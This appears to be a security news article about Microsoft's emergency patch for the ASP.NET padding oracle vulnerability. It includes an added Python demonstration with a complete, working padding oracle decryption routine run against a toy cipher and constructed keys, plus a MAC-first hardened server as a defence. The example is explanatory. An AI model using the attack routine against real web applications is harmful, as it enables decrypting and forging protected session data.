Microsoft has released the emergency out-of-band patch for the ASP.NET padding oracle attack, less than two weeks after a pair of researchers discussed the flaw and a reliable attack against it at a security conference in Argentina.
The patch for the ASP.NET bug is only available through Microsoft’s Download Center right now, but the company plans to push it out over Windows Update and Windows Server Update Services (WSUS) within a few days as well.
“For customers who use Automatic Updates, the update will be automatically applied once it is released broadly. Once the Security Update is applied, customers are protected against known attacks related to Security Advisory 2416728,” said Dave Forstrom, director of Trustworthy Computing at Microsoft.
The company will hold a live webcast at 4 p.m. EDT Tuesday to discuss the vulnerability and the patch release.
The ASP.NET vulnerability first came to light on Sept. 13, when the researchers who discovered it, Juliano Rizzo and Thai Duong, discussed the bug and their technique for exploiting it. The attack itself is a padding oracle attack, an application of a technique first described in 2002 against CBC-mode encryption: it does not break the cipher, but exploits an implementation that responds differently to ciphertexts with valid and invalid padding, turning the server into an oracle that an attacker can query, one byte at a time, to decrypt or forge data without knowing the key.
“We knew ASP.NET was vulnerable to our attack several months ago, but we didn’t know how serious it is until a couple of weeks ago. It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security,” said Duong, when discussing the attack. “It’s worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It’s just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes.”
Last week Microsoft released some guidance for customers, explaining a couple of workarounds for the vulnerability that could help mitigate attacks. However, Rizzo and Duong said that the workarounds, which rely on changing the way that error messages are generated by target Web applications, don’t protect against the attack, just one version of it.
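To make concrete both the technique described above and why an error-message workaround is a weak defence, here is an added example that is not code from this article, from Rizzo and Duong, or from Microsoft. It is written in Python rather than C# because the attack is independent of the framework: any server that decrypts a CBC-mode ciphertext and lets the attacker observe, through any channel, whether the PKCS#7 padding was valid gives up the plaintext byte by byte at a cost of at most 256 requests per byte, which is why the researchers can call the attack reliable and talk about it purely in terms of time. Everything here is constructed: the block cipher is a toy Feistel construction standing in for AES, the keys, IV and "secret" are fixed sample values, and LeakyServer and MacFirstServer are hypothetical stand-ins for a web application. The MAC-first variant shows the general hardening of verifying an authentication tag before decrypting, so that every forgery is rejected identically and the padding check never runs on attacker-supplied data; it is presented as standard practice, not as a description of what Microsoft's patch does.

```python
import hashlib
import hmac

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def feistel(key, block, decrypt=False):
    # Toy 4-round Feistel cipher standing in for AES; the attack is cipher-agnostic.
    l, r = (block[8:], block[:8]) if decrypt else (block[:8], block[8:])
    for i in (reversed(range(4)) if decrypt else range(4)):
        l, r = r, _xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return r + l if decrypt else l + r

def pad(data):  # PKCS#7
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev, padded = b"", iv, pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = feistel(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(feistel(key, ct[i:i + BLOCK], decrypt=True), prev)
        prev = ct[i:i + BLOCK]
    return unpad(out)

class LeakyServer:
    """Hypothetical server that decrypts first, so a padding failure is observable."""
    def __init__(self, key):
        self._key, self.queries = key, 0
    def padding_ok(self, iv, ct, tag=b""):
        self.queries += 1
        try:
            cbc_decrypt(self._key, iv, ct)
            return True
        except ValueError:
            return False

class MacFirstServer(LeakyServer):
    """Hardened variant: HMAC over iv||ct is verified before decryption, so every
    forgery is rejected identically and unpad() never runs on attacker data."""
    def __init__(self, key, mac_key):
        super().__init__(key)
        self._mac_key = mac_key
    def padding_ok(self, iv, ct, tag=b""):
        expected = hmac.new(self._mac_key, iv + ct, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            self.queries += 1
            return False
        return super().padding_ok(iv, ct)

def recover_block(oracle, prev, target):
    inter = bytearray(BLOCK)  # D_k(target): block-cipher output before the CBC xor
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        for guess in range(256):
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval  # already-known bytes forced to padval
            forged[pos] = guess
            if not oracle.padding_ok(bytes(forged), target):
                continue
            if pos == BLOCK - 1:
                # \x02\x02 (or longer) can pass too: disturb the neighbour, confirm it was \x01
                forged[pos - 1] ^= 0xFF
                if not oracle.padding_ok(bytes(forged), target):
                    continue
            inter[pos] = guess ^ padval
            break
        else:
            raise RuntimeError("no padding oracle: every forgery was rejected alike")
    return _xor(inter, prev)

def padding_oracle_decrypt(oracle, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return unpad(b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                          for i in range(1, len(blocks))))

def demo():
    key, mac_key, iv = b"k" * 16, b"m" * 16, b"i" * 16  # constructed, not real keys
    secret = b"constructed sample: serialized session state"  # constructed input
    ct = cbc_encrypt(key, iv, secret)
    leaky = LeakyServer(key)
    recovered = padding_oracle_decrypt(leaky, iv, ct)  # attacker never sees the key
    try:
        padding_oracle_decrypt(MacFirstServer(key, mac_key), iv, ct)
        blocked = False
    except RuntimeError:
        blocked = True
    return recovered, leaky.queries, blocked
```

demo() returns the recovered plaintext, the number of oracle queries the leaky server answered, and whether the MAC-first server stopped the attack. The query count, bounded by 256 per byte plus the occasional re-check for a spurious \x02\x02 hit, is the "matter of time" in Duong's remark; note that the attack consults only the yes/no answer of padding_ok, so suppressing the error page changes nothing if the same answer still leaks through a status code, a redirect, or response timing, whereas the MAC-first server returns the same rejection for every forgery.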
Microsoft didn’t release any information on the vulnerability until Sept. 17, the day that Rizzo and Duong gave their presentation at Ekoparty. This is the second time in less than two months that Microsoft has released an emergency patch: on Aug. 2, the company issued an out-of-band patch for the Windows shortcut (LNK) file bug that was identified as part of the Stuxnet malware attack.